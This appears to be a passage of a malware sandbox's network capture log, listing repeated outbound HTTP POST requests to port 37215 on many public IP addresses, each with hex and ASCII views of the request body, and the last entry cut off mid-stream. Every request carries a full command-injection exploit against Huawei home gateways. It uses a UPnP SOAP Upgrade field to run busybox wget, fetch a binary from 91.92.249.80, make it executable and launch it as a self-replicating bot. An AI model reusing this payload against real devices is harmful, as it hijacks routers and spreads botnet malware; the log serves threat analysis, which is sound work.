                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2211192.168.2.2349496197.142.174.1537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.662679911 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2212192.168.2.234775464.145.242.14037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.662744045 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2213192.168.2.2343554157.117.240.1937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.662769079 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2214192.168.2.235010641.231.138.15237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.662902117 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2215192.168.2.2342910157.171.154.24537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.662905931 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2216192.168.2.2343516157.101.75.15337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.662928104 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2217192.168.2.2340244197.69.185.18937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.663055897 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2218192.168.2.2343584217.244.90.14537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.663064003 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2219192.168.2.2351032197.182.252.2637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.663084030 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2220192.168.2.2354998212.210.77.2937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.663084030 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 